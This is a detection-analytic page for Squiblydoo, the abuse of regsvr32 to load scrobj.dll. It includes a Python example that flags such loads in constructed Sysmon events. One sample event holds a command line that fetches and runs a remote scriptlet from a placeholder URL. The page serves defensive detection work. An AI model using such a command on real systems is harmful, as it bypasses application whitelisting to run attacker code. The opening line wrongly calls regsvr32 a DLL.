Squiblydoo
Squiblydoo is a specific usage of regsvr32.dll to load a COM scriptlet directly from the internet and execute it in a way that bypasses application whitelisting. It can be seen by looking for regsvr32.exe executions that load scrobj.dll (which executes the COM scriptlet) or, if that is too noisy, only those that also load content directly via HTTP or HTTPS.
Squiblydoo was first written up by Casey Smith at Red Canary, though that blog post is no longer accessible.
ATT&CK Coverage
Implementations
This looks for any and all usage of the scrobj DLL, which is what is used to run COM scriptlets, so it detects scriptlets loaded from the network as well as from the filesystem. This will have almost zero false positives, so it is suitable for alerting.
Language: Splunk
Data Model: Sysmon
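To make the two detection tiers described above concrete, here is the same logic written in Python and run over a handful of constructed Sysmon events. This is an added example, not the analytic's own Splunk implementation: it assumes Sysmon Event ID 7 (Image Loaded) records carry Image, ImageLoaded and ProcessGuid, and that Event ID 1 (Process Create) records carry Image, CommandLine and ProcessGuid; the GUIDs, paths and the example.invalid URL in the sample data are made up.

```python
"""Squiblydoo detection logic over constructed Sysmon events.

Added example, not the analytic's own implementation. Assumes Sysmon
Event ID 7 (Image Loaded) records expose Image, ImageLoaded, ProcessGuid and
Event ID 1 (Process Create) records expose Image, CommandLine, ProcessGuid.
"""
import ntpath
import re

# Constructed sample events (not real telemetry); GUIDs and paths are made up.
SAMPLE_EVENTS = [
    # Process G-1: regsvr32 pulls a scriptlet over HTTPS and loads scrobj.dll.
    {"EventID": 1, "ProcessGuid": "{G-1}", "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s /u /i:https://example.invalid/test.sct scrobj.dll"},
    {"EventID": 7, "ProcessGuid": "{G-1}", "Image": r"C:\Windows\System32\regsvr32.exe",
     "ImageLoaded": r"C:\Windows\System32\scrobj.dll"},
    # Process G-2: local scriptlet, scrobj.dll loaded but no URL on the command line.
    {"EventID": 1, "ProcessGuid": "{G-2}", "Image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s /i:C:\Users\Public\local.sct scrobj.dll"},
    {"EventID": 7, "ProcessGuid": "{G-2}", "Image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "ImageLoaded": r"C:\Windows\SysWOW64\scrobj.dll"},
    # Process G-3: benign, regsvr32 registering an ordinary vendor DLL.
    {"EventID": 1, "ProcessGuid": "{G-3}", "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s C:\Program Files\Vendor\vendor.dll"},
    {"EventID": 7, "ProcessGuid": "{G-3}", "Image": r"C:\Windows\System32\regsvr32.exe",
     "ImageLoaded": r"C:\Program Files\Vendor\vendor.dll"},
    # Process G-4: benign, a different host process loading scrobj.dll.
    {"EventID": 7, "ProcessGuid": "{G-4}", "Image": r"C:\Windows\System32\mmc.exe",
     "ImageLoaded": r"C:\Windows\System32\scrobj.dll"},
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)


def basename_lower(path):
    """Case-insensitive file name of a Windows path (Sysmon paths use backslashes)."""
    return ntpath.basename(path).lower()


def scrobj_loads(events):
    """Tier 1 (the analytic as described): every regsvr32.exe process that
    loaded scrobj.dll, regardless of where the scriptlet came from.
    Returns the set of offending ProcessGuids."""
    return {
        e["ProcessGuid"] for e in events
        if e.get("EventID") == 7
        and basename_lower(e.get("Image", "")) == "regsvr32.exe"
        and basename_lower(e.get("ImageLoaded", "")) == "scrobj.dll"
    }


def remote_scrobj_loads(events):
    """Tier 2 (the narrower variant for noisy environments): keep only the
    tier-1 hits whose Process Create command line fetches content over HTTP(S).
    Correlation between Event ID 1 and Event ID 7 is done on ProcessGuid."""
    hits = scrobj_loads(events)
    remote = {
        e["ProcessGuid"] for e in events
        if e.get("EventID") == 1 and URL_RE.search(e.get("CommandLine", ""))
    }
    return hits & remote


if __name__ == "__main__":
    print("regsvr32.exe loading scrobj.dll:", sorted(scrobj_loads(SAMPLE_EVENTS)))
    print("...and fetching over HTTP(S):   ", sorted(remote_scrobj_loads(SAMPLE_EVENTS)))
```

On the sample data tier 1 flags G-1 and G-2 (both regsvr32 processes that loaded scrobj.dll) while G-3 (no scrobj.dll) and G-4 (scrobj.dll loaded by a different image) stay quiet; tier 2 narrows the result to G-1, the only process whose command line references an HTTP(S) location. Matching on the file name rather than the full path keeps both the System32 and SysWOW64 copies of regsvr32.exe in scope.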
Test Cases
The Atomic Red Team test for Squiblydoo is a good test case for this.
Data Model Mappings
References
As usual, credit to Roberto Rodriguez and the ThreatHunter Playbook.
Developer Certificate of Origin
DCO signed-off by: John Wunder jwunder@mitre.org